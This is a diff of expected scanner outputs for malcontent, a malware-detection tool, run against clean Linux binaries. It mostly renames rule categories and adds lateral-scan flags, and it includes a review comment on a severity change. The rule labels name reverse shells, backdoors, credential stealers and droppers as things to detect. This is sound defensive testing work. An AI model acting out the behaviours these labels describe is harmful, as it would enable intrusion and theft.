diff --git a/tests/linux/clean/runtime-security-fentry.o.simple b/tests/linux/clean/runtime-security-fentry.o.simple
index c320ec689..9513547c8 100644
--- a/tests/linux/clean/runtime-security-fentry.o.simple
+++ b/tests/linux/clean/runtime-security-fentry.o.simple
@@ -17,6 +17,7 @@ fs/permission/chown: low
 fs/permission/modify: medium
 fs/unmount: low
 impact/remote_access/net_exec: medium
+lateral/scan/tool: medium
 net/http/post: medium
 net/ip/multicast_send: low
 net/ip/parse: medium
diff --git a/tests/linux/clean/runtime-security-syscall-wrapper.o.simple b/tests/linux/clean/runtime-security-syscall-wrapper.o.simple
index 9abc1e818..fdfff6f56 100644
--- a/tests/linux/clean/runtime-security-syscall-wrapper.o.simple
+++ b/tests/linux/clean/runtime-security-syscall-wrapper.o.simple
@@ -18,6 +18,7 @@ fs/permission/chown: low
 fs/permission/modify: medium
 fs/unmount: low
 impact/remote_access/net_exec: medium
+lateral/scan/tool: medium
 net/http/post: medium
 net/ip/multicast_send: low
 net/ip/parse: medium
diff --git a/tests/linux/clean/runtime-security.o.simple b/tests/linux/clean/runtime-security.o.simple
index a00a6c4c9..741309cab 100644
--- a/tests/linux/clean/runtime-security.o.simple
+++ b/tests/linux/clean/runtime-security.o.simple
@@ -17,6 +17,7 @@ fs/permission/chown: low
 fs/permission/modify: medium
 fs/unmount: low
 impact/remote_access/net_exec: medium
+lateral/scan/tool: medium
 net/http/post: medium
 net/ip/multicast_send: low
 net/ip/parse: medium
diff --git a/tests/linux/clean/searchindex.json.simple b/tests/linux/clean/searchindex.json.simple
index 37d595af0..fefb0d049 100644
--- a/tests/linux/clean/searchindex.json.simple
+++ b/tests/linux/clean/searchindex.json.simple
@@ -12,8 +12,9 @@ data/random/insecure: low
 discover/components/docker: medium
 discover/system/platform: low
 discover/system/sysinfo: medium
-evasion/covert_location/chdir_unusual: medium
-evasion/hide_artifacts/system_directories: medium
+evasion/file/location/chdir_unusual: medium
+evasion/file/location/system_directories: medium
+evasion/rootkit/refs: medium
 exec/install_additional/package_install: medium
 exec/install_additional/pip_install: medium
 exec/plugin: low
@@ -43,7 +44,6 @@ impact/remote_access/backdoor: high
 impact/remote_access/reverse_shell: medium
 impact/remote_access/trojan: medium
 impact/rootkit: medium
-impact/rootkit/refs: medium
 net/dns/servers: low
 net/dns/txt: low
 net/download/fetch: medium
diff --git a/tests/linux/clean/slack.md b/tests/linux/clean/slack.md
index fea449489..1d262642c 100644
--- a/tests/linux/clean/slack.md
+++ b/tests/linux/clean/slack.md
@@ -29,8 +29,8 @@ | MEDIUM | [discover/system/platform](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/platform.yara#npm_uname) | [get system identification](https://nodejs.org/api/process.html) | [process.arch](https://github.com/search?q=process.arch&type=code)
[process.platform](https://github.com/search?q=process.platform&type=code)
[process.versions](https://github.com/search?q=process.versions&type=code) | | MEDIUM | [discover/system/sysinfo](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/sysinfo.yara#sysinfo) | [get system information (load, swap)](https://man7.org/linux/man-pages/man2/sysinfo.2.html) | [sysinfo](https://github.com/search?q=sysinfo&type=code) | | MEDIUM | [discover/user/info](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/userinfo.yara#userinfo) | returns user info for the current process | [os.homedir](https://github.com/search?q=os.homedir&type=code) | -| MEDIUM | [evasion/covert_location/dev_shm](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/covert-location/dev-shm.yara#dev_shm) | references path within /dev/shm (world writeable) | [/dev/shm/](https://github.com/search?q=%2Fdev%2Fshm%2F&type=code) | -| MEDIUM | [evasion/hidden_paths/hidden](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/hidden_paths/hidden.yara#static_hidden_path) | possible hidden file path | [/usr/lib/debug/.build-id](https://github.com/search?q=%2Fusr%2Flib%2Fdebug%2F.build-id&type=code) | +| MEDIUM | [evasion/file/location/dev_shm](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/file/location/dev-shm.yara#dev_shm) | references path within /dev/shm (world writeable) | [/dev/shm/](https://github.com/search?q=%2Fdev%2Fshm%2F&type=code) | +| MEDIUM | [evasion/file/prefix](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/file/prefix/prefix.yara#static_hidden_path) | possible hidden file path | [/usr/lib/debug/.build-id](https://github.com/search?q=%2Fusr%2Flib%2Fdebug%2F.build-id&type=code) | | MEDIUM | [evasion/process_injection/ptrace](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/process_injection/ptrace.yara#ptrace) | trace or modify system calls | [ptrace](https://github.com/search?q=ptrace&type=code) | | MEDIUM | 
[exec/cmd](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/cmd/cmd.yara#exec) | executes a command | [ExecuteCommandLists](https://github.com/search?q=ExecuteCommandLists&type=code)
[_executeCommand](https://github.com/search?q=_executeCommand&type=code)
[execCommand](https://github.com/search?q=execCommand&type=code)
[vkCmdExecuteCommands](https://github.com/search?q=vkCmdExecuteCommands&type=code) | | MEDIUM | [exec/dylib/symbol_address](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/dylib/symbol-address.yara#dlsym) | [get the address of a symbol](https://man7.org/linux/man-pages/man3/dlsym.3.html) | [dlsym](https://github.com/search?q=dlsym&type=code) | @@ -86,6 +86,7 @@ | MEDIUM | [os/kernel/opencl](https://github.com/chainguard-dev/malcontent/blob/main/rules/os/kernel/opencl.yara#OpenCL) | support for OpenCL | [OpenCL](https://github.com/search?q=OpenCL&type=code) | | MEDIUM | [privesc/sudo](https://github.com/chainguard-dev/malcontent/blob/main/rules/privesc/sudo.yara#sudo) | calls sudo | [sudo chmod 1777 /dev/shm](https://github.com/search?q=sudo+chmod+1777+%2Fdev%2Fshm&type=code) | | MEDIUM | [process/name_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/name-get.yara#process_name) | get the current process name | [process_name](https://github.com/search?q=process_name&type=code) | +| MEDIUM | [process/thread_local_storage](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/thread_local_storage.yara#tls_get_addr) | [looks up memory addresses for thread local storage or linked libraries](https://chao-tic.github.io/blog/2018/12/25/tls) | [__tls_get_addr](https://github.com/search?q=__tls_get_addr&type=code) | | MEDIUM | [sus/exclamation](https://github.com/chainguard-dev/malcontent/blob/main/rules/sus/exclamation.yara#exclamations) | gets very excited | [!!!!!!!!!!!!!!!!](https://github.com/search?q=%21%21%21%21%21%21%21%21%21%21%21%21%21%21%21%21&type=code)
[0 !!!](https://github.com/search?q=0+++++%21%21%21&type=code)
[11366 !!](https://github.com/search?q=11366++++++%21%21&type=code)
[12366 !!](https://github.com/search?q=12366+++++%21%21&type=code)
[AAHHKKO !!](https://github.com/search?q=AAHHKKO+++%21%21&type=code)
[ABHH !!](https://github.com/search?q=ABHH+++++%21%21&type=code)
[ACHIJNPRU !!](https://github.com/search?q=ACHIJNPRU+++%21%21&type=code)
[Could not format log message !!](https://github.com/search?q=Could+not+format+log+message+%21%21&type=code)
[FFHHL !!](https://github.com/search?q=FFHHL+++%21%21&type=code)
[GG !!](https://github.com/search?q=GG++++%21%21&type=code)
[INVALID CONSTRUCTOR!!!](https://github.com/search?q=INVALID+CONSTRUCTOR%21%21%21&type=code)
[INVALID MAP!!!](https://github.com/search?q=INVALID+MAP%21%21%21&type=code)
[INVALID SHARED ON CONSTRUCTOR!!!](https://github.com/search?q=INVALID+SHARED+ON+CONSTRUCTOR%21%21%21&type=code)
[return !!](https://github.com/search?q=return+%21%21&type=code) | | MEDIUM | [sus/intercept](https://github.com/chainguard-dev/malcontent/blob/main/rules/sus/intercept.yara#interceptor) | References interception | [interceptBufferProtocol](https://github.com/search?q=interceptBufferProtocol&type=code)
[interceptFileProtocol](https://github.com/search?q=interceptFileProtocol&type=code)
[interceptHttpProtocol](https://github.com/search?q=interceptHttpProtocol&type=code)
[interceptProtocol](https://github.com/search?q=interceptProtocol&type=code)
[interceptResponse](https://github.com/search?q=interceptResponse&type=code)
[interceptStreamProtocol](https://github.com/search?q=interceptStreamProtocol&type=code)
[interceptStringProtocol](https://github.com/search?q=interceptStringProtocol&type=code)
[intercepted](https://github.com/search?q=intercepted&type=code)
[intercepting](https://github.com/search?q=intercepting&type=code)
[interceptionId](https://github.com/search?q=interceptionId&type=code)
[interceptionStage](https://github.com/search?q=interceptionStage&type=code)
[interceptor_info_map](https://github.com/search?q=interceptor_info_map&type=code)
[interceptor_url_loader_throttle](https://github.com/search?q=interceptor_url_loader_throttle&type=code)
[interceptors](https://github.com/search?q=interceptors&type=code)
[intercepts](https://github.com/search?q=intercepts&type=code) | | MEDIUM | [sus/leetspeak](https://github.com/chainguard-dev/malcontent/blob/main/rules/sus/leetspeak.yara#one_three_three_seven) | References 1337 terminology' | [1337](https://github.com/search?q=1337&type=code) | @@ -175,6 +176,5 @@ | LOW | [process/groups_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/groups-set.yara#setgroups) | set group access list | [setgroups](https://github.com/search?q=setgroups&type=code) | | LOW | [process/multithreaded](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/multithreaded.yara#pthread_create) | [creates pthreads](https://man7.org/linux/man-pages/man3/pthread_create.3.html) | [pthread_create](https://github.com/search?q=pthread_create&type=code) | | LOW | [process/parent_pid_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/parent_pid-get.yara#getppid) | gets parent process ID | [getppid](https://github.com/search?q=getppid&type=code) | -| LOW | [process/thread_local_storage](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/thread_local_storage.yara#tls_get_addr) | [Uses glibc thread local storage](https://chao-tic.github.io/blog/2018/12/25/tls) | [__tls_get_addr](https://github.com/search?q=__tls_get_addr&type=code) | | LOW | [process/userid_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/userid-set.yara#setuid) | [set real and effective user ID of current process](https://man7.org/linux/man-pages/man2/setuid.2.html) | [setuid](https://github.com/search?q=setuid&type=code) | diff --git a/tests/linux/clean/slirp4netns.simple b/tests/linux/clean/slirp4netns.simple index 290ed36cd..1129120a1 100644 --- a/tests/linux/clean/slirp4netns.simple +++ b/tests/linux/clean/slirp4netns.simple 
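Review bot: `process/thread_local_storage` now lands in Slack's MEDIUM table on the single symbol `__tls_get_addr`, while the LOW entry for the same rule is removed in the `@@ -175` hunk below. `__tls_get_addr` is the standard dynamic-TLS accessor referenced by ordinary glibc-linked binaries, so raising `tls_get_addr` to MEDIUM (the change in `rules/process/thread_local_storage.yara` is outside this chunk and inferred from the fixture) is likely to add a MEDIUM row to most clean Linux baselines. If the intent is to catch TLS-based hooking of linked libraries, pairing the symbol with a hooking indicator or keeping the severity at LOW would avoid that noise in the clean expectations.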
@@ -13,8 +13,8 @@ discover/system/platform: low
 discover/system/sysinfo: medium
 discover/user/HOME: low
 discover/user/USER: low
-evasion/covert_location/dev_shm: medium
-evasion/hidden_paths/var_run: medium
+evasion/file/location/dev_shm: medium
+evasion/file/location/var_run: medium
 evasion/hide_artifacts/pivot_root: medium
 evasion/hijack_execution/LD_LIBRARY_PATH: low
 evasion/logging/acct: low
diff --git a/tests/linux/clean/sonarlint-metadata.json.simple b/tests/linux/clean/sonarlint-metadata.json.simple
index dfa4e21ef..309d055f6 100644
--- a/tests/linux/clean/sonarlint-metadata.json.simple
+++ b/tests/linux/clean/sonarlint-metadata.json.simple
@@ -13,8 +13,8 @@ crypto/uuid: medium
 data/encoding/json_decode: low
 data/encoding/json_encode: low
 discover/network/interface_list: medium
-evasion/covert_location/dev_mqueue: medium
-evasion/hidden_paths/hidden: medium
+evasion/file/location/dev_mqueue: medium
+evasion/file/prefix: medium
 exec/plugin: low
 exfil/stealer/credit_card: medium
 fs/file/copy: medium
@@ -37,6 +37,7 @@ impact/exploit: medium
 impact/infection/infected: medium
 impact/remote_access/agent: medium
 lateral/scan/brute_force: low
+lateral/scan/tool: medium
 net/download: medium
 net/http/2: low
 net/http/cookies: medium
diff --git a/tests/linux/clean/sudo.simple b/tests/linux/clean/sudo.simple
index 50c4fb0a8..5870618b0 100644
--- a/tests/linux/clean/sudo.simple
+++ b/tests/linux/clean/sudo.simple
@@ -4,8 +4,8 @@ discover/network/interface_list: medium
 discover/system/cpu_info: low
 discover/system/hostname_get: low
 discover/user/HOME: low
-evasion/hidden_paths/hidden: medium
-evasion/hidden_paths/var_tmp: medium
+evasion/file/location/var_tmp: medium
+evasion/file/prefix: medium
 evasion/process_injection/ptrace: medium
 exec/plugin: low
 exec/program: medium
@@ -28,6 +28,7 @@ fs/permission/chown: low
 fs/proc/arbitrary_pid: medium
 fs/proc/pid_exe: medium
 fs/tempdir/tempfile_create: low
+lateral/scan/tool: medium
 net/ip/string: medium
 net/socket/listen: medium
 net/socket/local_addr: low
diff --git a/tests/linux/clean/tracer.o.aarch64.simple b/tests/linux/clean/tracer.o.aarch64.simple
index 5190dad6d..79e3feebe 100644
--- a/tests/linux/clean/tracer.o.aarch64.simple
+++ b/tests/linux/clean/tracer.o.aarch64.simple
@@ -6,6 +6,7 @@ discover/network/netstat: medium
 evasion/bypass_security/linux/iptables: medium
 evasion/logging/acct: low
 impact/remote_access/heartbeat: medium
+lateral/scan/tool: medium
 net/http/post: medium
 net/ip/multicast_send: low
 net/ip/syncookie: medium
diff --git a/tests/linux/clean/tree-sitter.md b/tests/linux/clean/tree-sitter.md
index 80a679dae..41eb959b5 100644
--- a/tests/linux/clean/tree-sitter.md
+++ b/tests/linux/clean/tree-sitter.md
@@ -1,46 +1,47 @@ ## linux/clean/tree-sitter [🛑 HIGH] -| RISK | KEY | DESCRIPTION | EVIDENCE | -|--------|-------------------------------------------------------------------------------------------------------------------------------------------------|----------------------------------------------------------------------------------------------------------|---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
-----------------------------------------------------------------| -| HIGH | [exec/shell/tmp_semicolon](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/shell/tmp_semicolon.yara#semicolon_short_tmp) | unusual one-liners involving /tmp | [--;/tmp/rust-20241004-6494-uljaw4/rustc-1](https://github.com/search?q=--%3B%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1&type=code) | -| MEDIUM | [c2/tool_transfer/dropper](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/dropper.yara#dropper) | References 'dropper' | [Dropper](https://github.com/search?q=Dropper&type=code) | -| MEDIUM | [data/embedded/html](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/embedded/embedded-html.yara#html) | Contains HTML content | [DOCTYPE html](https://github.com/search?q=DOCTYPE+html&type=code) | -| MEDIUM | [evasion/hidden_paths/hidden](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/hidden_paths/hidden.yara#static_hidden_path) | possible hidden file path | [/clap/issues/home/linuxbrew/.cache](https://github.com/search?q=%2Fclap%2Fissues%2Fhome%2Flinuxbrew%2F.cache&type=code)
[/debug/.J](https://github.com/search?q=%2Fdebug%2F.J&type=code)
[/home/linuxbrew/.linuxbrew](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew&type=code) | -| MEDIUM | [exec/dylib/symbol_address](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/dylib/symbol-address.yara#dlsym) | [get the address of a symbol](https://man7.org/linux/man-pages/man3/dlsym.3.html) | [dlsym](https://github.com/search?q=dlsym&type=code) | -| MEDIUM | [exec/program](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/program/program.yara#execall) | executes external programs | [execvp](https://github.com/search?q=execvp&type=code) | -| MEDIUM | [exec/shell/power](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/shell/powershell.yara#powershell) | powershell | [powershell](https://github.com/search?q=powershell&type=code) | -| MEDIUM | [fs/path/home](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/home.yara#home_path) | references path within /home | [/home/linuxbrew/.cache/Homebrew/cargo_cache/registry/src/index.crates.](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.cache%2FHomebrew%2Fcargo_cache%2Fregistry%2Fsrc%2Findex.crates.&type=code)
[/home/linuxbrew/.linuxbrew/Cellar/tree-sitter/0.24.2/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2FCellar%2Ftree-sitter%2F0.24.2%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/lib/ld.so](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Flib%2Fld.so&type=code)
[/home/linuxbrew/.linuxbrew/opt/gcc/lib/gcc/current](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fgcc%2Flib%2Fgcc%2Fcurrent&type=code) | -| MEDIUM | [fs/path/tmp](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/tmp.yara#tmp_path) | path reference within /tmp | [/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/alloc/src/col](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Falloc%2Fsrc%2Fcol&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/alloc/src/raw](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Falloc%2Fsrc%2Fraw&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/alloc/src/str](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Falloc%2Fsrc%2Fstr&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/alloc/src/syn](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Falloc%2Fsrc%2Fsyn&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/alloc/src/vec](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Falloc%2Fsrc%2Fvec&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/core/src/cell](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Fcore%2Fsrc%2Fcell&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/core/src/esca](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Fcore%2Fsrc%2Fesca&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/core/src/io/b](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Fcore%2Fsrc%2Fio%2Fb&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/core/src/num/](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Fcore%2Fsrc%2Fnum%2F&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/core/src/ops/](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Fcore%2Fsrc%2Fops%2F&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/core/src/slic](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Fcore%2Fsrc%2Fslic&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/core/src/str/](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Fcore%2Fsrc%2Fstr%2F&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/core/src/time](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Fcore%2Fsrc%2Ftime&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/std/src/io/mo](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Fstd%2Fsrc%2Fio%2Fmo&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/std/src/io/st](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Fstd%2Fsrc%2Fio%2Fst&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/std/src/os/fd](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Fstd%2Fsrc%2Fos%2Ffd&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/std/src/sync/](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Fstd%2Fsrc%2Fsync%2F&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/std/src/sys/p](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Fstd%2Fsrc%2Fsys%2Fp&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/std/src/sys/s](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Fstd%2Fsrc%2Fsys%2Fs&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/library/std/src/threa](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Flibrary%2Fstd%2Fsrc%2Fthrea&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/vendor/addr2line-0.22](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Fvendor%2Faddr2line-0.22&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/vendor/gimli-0.29.0/s](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Fvendor%2Fgimli-0.29.0%2Fs&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/vendor/hashbrown-0.14](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Fvendor%2Fhashbrown-0.14&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/vendor/miniz_oxide-0.](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Fvendor%2Fminiz_oxide-0.&type=code)
[/tmp/rust-20241004-6494-uljaw4/rustc-1.81.0-src/vendor/rustc-demangle](https://github.com/search?q=%2Ftmp%2Frust-20241004-6494-uljaw4%2Frustc-1.81.0-src%2Fvendor%2Frustc-demangle&type=code)
[/tmp/tree-sitter-20241006-6697-pa8oo4/tree-sitter-0.24.2/cli/config/s](https://github.com/search?q=%2Ftmp%2Ftree-sitter-20241006-6697-pa8oo4%2Ftree-sitter-0.24.2%2Fcli%2Fconfig%2Fs&type=code)
[/tmp/tree-sitter-20241006-6697-pa8oo4/tree-sitter-0.24.2/cli/generate](https://github.com/search?q=%2Ftmp%2Ftree-sitter-20241006-6697-pa8oo4%2Ftree-sitter-0.24.2%2Fcli%2Fgenerate&type=code)
[/tmp/tree-sitter-20241006-6697-pa8oo4/tree-sitter-0.24.2/cli/src/high](https://github.com/search?q=%2Ftmp%2Ftree-sitter-20241006-6697-pa8oo4%2Ftree-sitter-0.24.2%2Fcli%2Fsrc%2Fhigh&type=code)
[/tmp/tree-sitter-20241006-6697-pa8oo4/tree-sitter-0.24.2/highlight/sr](https://github.com/search?q=%2Ftmp%2Ftree-sitter-20241006-6697-pa8oo4%2Ftree-sitter-0.24.2%2Fhighlight%2Fsr&type=code)
[/tmp/tree-sitter-20241006-6697-pa8oo4/tree-sitter-0.24.2/lib/binding_](https://github.com/search?q=%2Ftmp%2Ftree-sitter-20241006-6697-pa8oo4%2Ftree-sitter-0.24.2%2Flib%2Fbinding_&type=code)
[/tmp/tree-sitter-20241006-6697-pa8oo4/tree-sitter-0.24.2/lib/src/././](https://github.com/search?q=%2Ftmp%2Ftree-sitter-20241006-6697-pa8oo4%2Ftree-sitter-0.24.2%2Flib%2Fsrc%2F.%2F.%2F&type=code)
[/tmp/tree-sitter-20241006-6697-pa8oo4/tree-sitter-0.24.2/lib/src/./ge](https://github.com/search?q=%2Ftmp%2Ftree-sitter-20241006-6697-pa8oo4%2Ftree-sitter-0.24.2%2Flib%2Fsrc%2F.%2Fge&type=code)
[/tmp/tree-sitter-20241006-6697-pa8oo4/tree-sitter-0.24.2/lib/src/./la](https://github.com/search?q=%2Ftmp%2Ftree-sitter-20241006-6697-pa8oo4%2Ftree-sitter-0.24.2%2Flib%2Fsrc%2F.%2Fla&type=code)
[/tmp/tree-sitter-20241006-6697-pa8oo4/tree-sitter-0.24.2/lib/src/./pa](https://github.com/search?q=%2Ftmp%2Ftree-sitter-20241006-6697-pa8oo4%2Ftree-sitter-0.24.2%2Flib%2Fsrc%2F.%2Fpa&type=code)
[/tmp/tree-sitter-20241006-6697-pa8oo4/tree-sitter-0.24.2/lib/src/./qu](https://github.com/search?q=%2Ftmp%2Ftree-sitter-20241006-6697-pa8oo4%2Ftree-sitter-0.24.2%2Flib%2Fsrc%2F.%2Fqu&type=code)
[/tmp/tree-sitter-20241006-6697-pa8oo4/tree-sitter-0.24.2/lib/src/./st](https://github.com/search?q=%2Ftmp%2Ftree-sitter-20241006-6697-pa8oo4%2Ftree-sitter-0.24.2%2Flib%2Fsrc%2F.%2Fst&type=code)
[/tmp/tree-sitter-20241006-6697-pa8oo4/tree-sitter-0.24.2/lib/src/./su](https://github.com/search?q=%2Ftmp%2Ftree-sitter-20241006-6697-pa8oo4%2Ftree-sitter-0.24.2%2Flib%2Fsrc%2F.%2Fsu&type=code)
[/tmp/tree-sitter-20241006-6697-pa8oo4/tree-sitter-0.24.2/lib/src/./tr](https://github.com/search?q=%2Ftmp%2Ftree-sitter-20241006-6697-pa8oo4%2Ftree-sitter-0.24.2%2Flib%2Fsrc%2F.%2Ftr&type=code)
[/tmp/tree-sitter-20241006-6697-pa8oo4/tree-sitter-0.24.2/tags/src/lib](https://github.com/search?q=%2Ftmp%2Ftree-sitter-20241006-6697-pa8oo4%2Ftree-sitter-0.24.2%2Ftags%2Fsrc%2Flib&type=code) | -| MEDIUM | [fs/proc/self_exe](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/proc/self-exe.yara#proc_self_exe) | gets executable associated to this process | [/proc/self/exe](https://github.com/search?q=%2Fproc%2Fself%2Fexe&type=code) | -| MEDIUM | [net/http/post](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/post.yara#http_post) | submits content to websites | [Content-Type](https://github.com/search?q=Content-Type&type=code)
[HTTP](https://github.com/search?q=HTTP&type=code)
[POST](https://github.com/search?q=POST&type=code)
